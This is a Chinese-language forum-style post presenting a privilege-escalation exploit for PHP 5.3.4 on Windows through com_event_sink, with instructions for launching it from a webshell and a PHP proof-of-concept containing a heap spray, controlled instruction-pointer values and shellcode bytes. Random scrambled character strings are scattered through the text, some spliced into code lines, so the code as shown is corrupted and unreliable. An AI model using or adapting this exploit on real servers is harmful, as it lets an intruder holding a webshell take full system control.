PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
5 T: @1 [  j8 B# x) J) a7 O7 S
测试方法如下：cmd /c x:\php\php.exe x:\test.php
* K8 ]& S. _% y% V
下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
这里是两个测试的截图：

" D8 Q* F9 {4 M$ Y" S

  @1 a, f- B- o- J; ]3 `% k1 r
, h: B( s* c1 C8 Q5 p6 Q$ M6 y
成功利用此漏洞的攻击者将获得系统的最高权限

  Q' d4 u7 Z4 Q$ [  y  c
( v+ z% R. Z' F# K) J
: g0 `6 T" X- Z, t3 c+ c# Z

: c2 r! }2 Y+ V; c( W1 k关于漏洞分析稍后附上。一下是PoC代码：
( u& s, x- I2 E2 a
<?php
' P4 l4 n( r/ Q, R/ w* S( G8 e//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
1 ]- w. F" L2 |$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);
//048d0190
echo strlen($axespray);
7 N7 E3 |( P2 T' t! k, {! B& Uecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
2 e7 A4 u0 W8 R9 z, becho "Silic Group Hacker Army - BlackBap.Org";
+ k) o, M! ^- W//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
$u[] =$deodrant;
* k0 r$ x- |  E1 Q, H* X3 x/ c$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
/ W: [  m- h; G4 e$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$vVar = new VARIANT(0x048d0000+180);
, ?, e6 K8 Y8 s$ X( \//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
7 l* b* I' F) l' b# T0 @$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
/ c4 F. E5 j$ b9 Z# L; O?>
! |# [% Z* j; @